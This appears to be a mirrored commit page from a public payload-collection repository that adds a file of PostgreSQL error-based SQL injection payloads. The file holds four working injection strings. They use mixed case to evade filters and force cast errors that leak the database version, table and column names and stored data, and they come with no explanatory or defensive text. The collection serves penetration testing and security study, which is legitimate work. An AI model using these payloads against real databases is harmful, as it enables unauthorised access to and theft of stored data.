mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-03 08:17:11 -08:00
SQL injections payloads separated + OAuth
This commit is contained in:
9
SQL injection/PostgreSQL Injection.md
Normal file
9
SQL injection/PostgreSQL Injection.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# POSTGRESQL
|
||||
|
||||
##PostgreSQL Error Based - Basic
|
||||
```
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
```
|
||||
Reference in New Issue
Block a user